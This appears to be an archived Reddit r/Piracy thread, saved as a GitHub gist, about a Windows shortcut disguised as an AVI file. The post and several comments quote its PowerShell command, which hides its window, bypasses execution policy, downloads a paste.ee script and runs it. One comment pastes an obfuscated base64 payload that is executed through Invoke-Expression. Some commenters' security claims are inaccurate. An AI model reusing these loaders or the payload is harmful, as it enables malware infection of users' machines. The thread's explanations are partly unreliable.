Created
March 23, 2019 02:19
-
-
Save ohhdemgirls/a237f11b16c83ba943bd3bc29663a830 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!doctype html> | |
<html lang="en"> | |
<head> | |
<meta charset="utf-8"> | |
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> | |
<link rel="stylesheet" href="../../../../../../../../static/css/lato.css"> | |
<link rel="stylesheet" href="../../../../../../../../static/css/bootstrap-superhero.min.css"> | |
<link rel="stylesheet" href="../../../../../../../../static/css/archive.css"> | |
<title>r/Piracy: Ran Across a Shortcut Disguised as an AVI File</title> | |
</head> | |
<body> | |
<header> | |
<nav class="navbar navbar-expand-sm navbar-dark bg-primary"> | |
<a class="navbar-brand" href="../../../../../../../../Piracy/index.html">r/Piracy</a> | |
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation"> | |
<span class="navbar-toggler-icon"></span> | |
</button> | |
<div class="collapse navbar-collapse" id="navbarNav"> | |
<ul class="navbar-nav"> | |
<li class="nav-item"> | |
<a class="nav-link" href="../../../../../../../../Piracy/index.html">score</a> | |
</li> | |
<li class="nav-item"> | |
<a class="nav-link" href="../../../../../../../../Piracy/index-comments/index.html">comments</a> | |
</li> | |
<li class="nav-item"> | |
<a class="nav-link" href="../../../../../../../../Piracy/index-date/index.html">date</a> | |
</li> | |
<li class="nav-item ###URL_SEARCH_CSS###"> | |
<a class="nav-link" href="../../../../../../../../Piracy/search.html">search</a> | |
</li> | |
<li class="nav-item dropdown"> | |
<a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">subreddits</a> | |
<div class="dropdown-menu" aria-labelledby="navbarDropdown"> | |
<a class="dropdown-item" href="../../../../../../../../index.html">All</a> | |
<a class="dropdown-item" href="../../../../../../../../Piracy/index.html">Piracy</a> | |
</div> | |
</li> | |
</ul> | |
</div> | |
</nav> | |
</header> | |
<main role="main" class="container-fluid"> | |
<div class="submission pt-3" data-id="9o7s0f"> | |
<h3 class="title">Ran Across a Shortcut Disguised as an AVI File</h3> | |
<p><span class="badge badge-primary">1</span> 2018-10-15 by <a class="author" href="../../../../../../../../user/killthealias.html">killthealias</a></p> | |
<div class="card bg-dark mb-3"><div class="card-body md"><p>Had the following code embedded in it </p> | |
<p>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString('<a href="https://paste.ee/r/oMFtp/0">https://paste.ee/r/oMFtp/0</a>');IEX $wcli </p> | |
<p>Can anyone make sense of it? Should I do anything to protect myself after accidentally running it? </p> | |
</div></div> | |
</div> | |
<div class="comments"> | |
<h5>29 comments</h5> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s29gs"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/drifting_on.html">drifting_on</a> 2018-10-15</p> | |
<div class="md"><p>It's downloading from <a href="https://paste.ee/r/oMFtp/0">https://paste.ee/r/oMFtp/0</a> and then running whatever it downloads. Didn't open the link myself as it is going to be malware/virus/etc...</p> | |
<p>You should probably clean your computer</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7tprm2"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/NukeOfTheShadow.html">NukeOfTheShadow</a> 2018-10-15</p> | |
<div class="md"><p>“Page not found“</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7s2uqi"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p> | |
<div class="md"><p>You know paste.ee is a pastebin alternative right? It's just a page full of text. Jeez.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7s3jeu"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/drifting_on.html">drifting_on</a> 2018-10-15</p> | |
<div class="md"><blockquote> | |
<p>It's just a page full of text. Jeez. Opening the link in your browser won't do anything</p> | |
</blockquote> | |
<p>I never said it was going to do anything.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7s4mj4"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p> | |
<div class="md"><blockquote> | |
<p>Didn't open the link myself as it is going to be malware/virus/etc...</p> | |
</blockquote> | |
<p>You are saying the reason you didn't open the link was because it may be malware. Nothing is wrong with opening the link in a browser. The harmful part would be executing the script in PowerShell.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-4" data-depth="4" data-id="e7s5cxg"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/drifting_on.html">drifting_on</a> 2018-10-15</p> | |
<div class="md"><p>I was saying I didn't open the link cause I knew what it most likely was and wasn't going to analyze its contents. Though I can see how you could interpret what I wrote how you did</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-5" data-depth="5" data-id="e7s7114"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p> | |
<div class="md"><p>Sorry, I'm just not feeling well today and haven't slept properly in a few days. I get kinda agitated easily.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7s3m9c"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/huckpie.html">huckpie</a> 2018-10-15</p> | |
<div class="md"><p>From what I can tell, the script downloads that paste to a text file and executes it. The file itself appears to be some obfuscated VBS which as we all know has been used for malicious intent.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7s4fbo"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/Sunny_Cakes.html">Sunny_Cakes</a> 2018-10-15</p> | |
<div class="md"><p>How would the script execute itself though? Is it meant to be opened with a specific media player that allows for powershell scripts? </p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-4" data-depth="4" data-id="e7s6rmf"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/just_another_flogger.html">just_another_flogger</a> 2018-10-15</p> | |
<div class="md"><p>The shortcut isn't an AVI file, it's just a shortcut with .avi in the name of the shortcut.</p> | |
<p>The shortcut leads to powershell, which is installed on most PCs. It tried to download the raw content of a pastebin, save it as a script, and execute it.</p> | |
<p>This attack would fail on most systems, because the script would not be signed and most people are on the default security settings for powershell.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-5" data-depth="5" data-id="e7s6w26"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/Sunny_Cakes.html">Sunny_Cakes</a> 2018-10-15</p> | |
<div class="md"><p>Ah you mean, notavirus.avi.ps1? That's amateurish, I considered that scenario but honestly didn't believe people would post about such an obvious attack vector.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7sgxu5"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/rakuanu.html">rakuanu</a> 2018-10-15</p> | |
<div class="md"><p>It seems the link is dead. I don't suppose you still have the data for it so I can study it?</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s46mo"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/drzendoom.html">drzendoom</a> 2018-10-15</p> | |
<div class="md"><p>yeah, i got hit as well, any solutions?</p> | |
<p>&#x200B;</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s4nvq"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p> | |
<div class="md"><p>How exactly was it "disguised" as an AVI file?</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7s4ttn"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/Halfpipe1234.html">Halfpipe1234</a> 2018-10-15</p> | |
<div class="md"><p>I'm guessing a streaming site or something</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7s73us"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p> | |
<div class="md"><p>This would require it to be downloaded and executed though. In that case it would be obvious it's not an AVI file.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7s80sx"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/just_another_flogger.html">just_another_flogger</a> 2018-10-15</p> | |
<div class="md"><p>Could be placed in a RAR/ZIP that's been 0-byte padded to look large, then you right click -> extract -> double click it.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7sfq7c"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p> | |
<div class="md"><p>But you would see the file extension is not avi after extraction.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7skayx"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/just_another_flogger.html">just_another_flogger</a> 2018-10-15</p> | |
<div class="md"><p>That is inaccurate.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-4" data-depth="4" data-id="e7ue4oh"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p> | |
<div class="md"><p>That's actually exactly how I thought they did it. However if you have file extensions DISABLED normally you would find it weird to see it there. (I always have them enabled.) I also have shortcut arrows removed, so tbh this is the perfect thing to target me, except for the fact that I use MPC-HC as default so I'd notice something wrong with the file icon.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s87o3"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/exodus_cl.html">exodus_cl</a> 2018-10-15</p> | |
<div class="md"><p>an avi file with that string??? could you share more info?</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7uzpu2"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/adr0ckin.html">adr0ckin</a> 2018-10-15</p> | |
<div class="md"><p>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString('<a href="https://paste.ee/r/aftkm/0">https://paste.ee/r/aftkm/0</a>');IEX $wcli</p> | |
<p>here is the <a href="https://paste.ee">paste.ee</a> site.. </p> | |
<p>( nEW-OBJEcT Io.cOMPRESSIoN.DeFlaTesTrEAM([io.meMoRystREAM] [SysTEM.cOnvErT]::FroMbAsE64sTRINg('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' ) ,[sYStEm.io.COmPReSsioN.coMPRESSIoNmoDE]::dEcOMpreSS ) |FoREaCH-oBJECT{ nEW-OBJEcT systEM.Io.StREAmReADeR($_ , [teXT.EnCoDIng]::aScIi )}).REaDtOEND( )| inVokE-eXPrESSion </p> | |
<p>&#x200B;</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7sb1s9"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/RobinsonDickinson.html">RobinsonDickinson</a> 2018-10-15</p> | |
<div class="md"><p>so how did u get it in the first place? a file just dont random download itself..</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7sh0n5"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/CaineBK.html">CaineBK</a> 2018-10-15</p> | |
<div class="md"><p>Relevant flair. </p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7sfol5"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/rakuanu.html">rakuanu</a> 2018-10-15</p> | |
<div class="md"><p>I'm not expert by many means but it seems that the page it tries to retrieve data from has been removed by the website itself so I would imagine that its intended payload was never retrieved thus... a dead malware file? I could be totally wrong though. </p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7sjtom"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/waSItaSdm.html">waSItaSdm</a> 2018-10-15</p> | |
<div class="md"><p>Yes, the link is dead so there's no string to download and execute. Got lucky this time.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7sxtfw"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/streamingisretarded.html">streamingisretarded</a> 2018-10-15</p> | |
<div class="md"><p>that'll learn ya for downloading crazy rich asians</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7t7jbf"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/EqualityOfAutonomy.html">EqualityOfAutonomy</a> 2018-10-15</p> | |
<div class="md"><p>Since that page is 404 you may have been lucky and it didn't work as intended.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7uzg3l"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/adr0ckin.html">adr0ckin</a> 2018-10-15</p> | |
<div class="md"><p>Here is the script i got..</p> | |
<p>&#x200B;</p> | |
<p>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString('<a href="https://paste.ee/r/aftkm/0">https://paste.ee/r/aftkm/0</a>');IEX $wcli</p> | |
</div> | |
</div> | |
</div> | |
</main> | |
<footer class="container-fluid"> | |
<a class="to-top mt-1 mb-1 btn btn-lg btn-primary" href="#top">top of page</a> | |
<p class="small mb-0">data archived 2018-10-15. <a href="https://github.com/libertysoft3/reddit-html-archiver">source code</a>.</p> | |
</footer> | |
<script src="../../../../../../../../static/js/jquery-3.3.1.slim.min.js"></script> | |
<script src="../../../../../../../../static/js/bootstrap.min.js"></script> | |
<script src="../../../../../../../../static/js/archive-comments.js"></script> | |
</body> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment